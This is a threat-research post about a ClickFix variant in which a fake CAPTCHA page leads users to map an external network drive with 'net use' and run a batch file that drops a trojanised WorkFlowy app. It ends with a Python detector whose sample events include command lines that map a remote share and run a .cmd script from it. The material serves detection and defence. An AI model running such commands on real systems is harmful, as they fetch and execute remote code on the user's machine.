2026-03-13 13:28 UTC

Investigating a New Click-Fix Variant

Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities.

It is based on independent research and observations of the current threat landscape available at the time of publication.

The content is intended for informational and preparedness purposes only.


Atos researchers identified a new variant of the popular ClickFix technique, in which attackers convince the user to execute a malicious command on their own device through the Win + R shortcut.

In this variation, a “net use” command is used to map a network drive from an external server, after which a “.cmd” batch file hosted on that drive is executed.

The script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside an “.asar” archive.

The modified application acts as a C2 beacon and a dropper for the final malware payload.

In this version, the initial attack vector is the same as in the other ClickFix variants: a web page posing as a CAPTCHA mechanism – “happyglamper[.]ro”.
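The “net use” step described above leaves a trace in process-creation telemetry (for example Sysmon Event ID 1 or Security Event 4688 with command-line auditing). The Python below is an added example, not code from the Atos report: it flags a “.cmd” file run from a drive letter that was mapped to a server outside the organization. The event fields, the internal DNS suffix and all sample command lines are constructed assumptions.

```python
import ipaddress
import re

# "net use <drive>: \\host\share" (host captured up to the first "\" or "@")
NET_USE = re.compile(r'\bnet1?(?:\.exe)?\s+use\s+([a-z]):\s+\\\\([^\\\s@]+)', re.I)
# A .cmd file launched from a drive-letter path
CMD_RUN = re.compile(r'(?<![a-z])([a-z]):\\[^\s"&|]*\.cmd\b', re.I)

INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_SUFFIXES = (".corp.example",)  # assumption: replace with your AD/DNS suffixes

def is_external(host):
    host = host.lower()
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Hostname: single-label (NetBIOS) names and internal suffixes count as internal.
        return "." in host and not host.endswith(INTERNAL_SUFFIXES)
    return not any(ip in net for net in INTERNAL_NETS)

def detect(events):
    """Return (endpoint, server, script) for each .cmd run from an externally mapped drive."""
    mapped = {}  # (endpoint, drive letter) -> external server it currently maps to
    alerts = []
    for ev in events:  # events must be in chronological order
        for m in NET_USE.finditer(ev["cmdline"]):
            key = (ev["endpoint"], m.group(1).upper())
            if is_external(m.group(2)):
                mapped[key] = m.group(2)
            else:
                mapped.pop(key, None)  # letter re-mapped to an internal share
        for m in CMD_RUN.finditer(ev["cmdline"]):
            server = mapped.get((ev["endpoint"], m.group(1).upper()))
            if server:
                alerts.append((ev["endpoint"], server, m.group(0)))
    return alerts

# Constructed process-creation events (not taken from the report).
SAMPLE_EVENTS = [
    {"endpoint": "WS-01", "cmdline": r'cmd.exe /c net use Z: \\files.example.net\share && Z:\setup.cmd'},
    {"endpoint": "WS-02", "cmdline": r'net use H: \\fileserver01\home'},
    {"endpoint": "WS-02", "cmdline": r'cmd.exe /c H:\logon.cmd'},
    {"endpoint": "WS-03", "cmdline": r'net use Y: \\198.51.100.7\pub'},
    {"endpoint": "WS-03", "cmdline": r'cmd.exe /c Y:\run.cmd'},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT", alert)
```

The internal logon script on WS-02 is not flagged, while both the single-line chain on WS-01 and the two-event sequence on WS-03 are.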
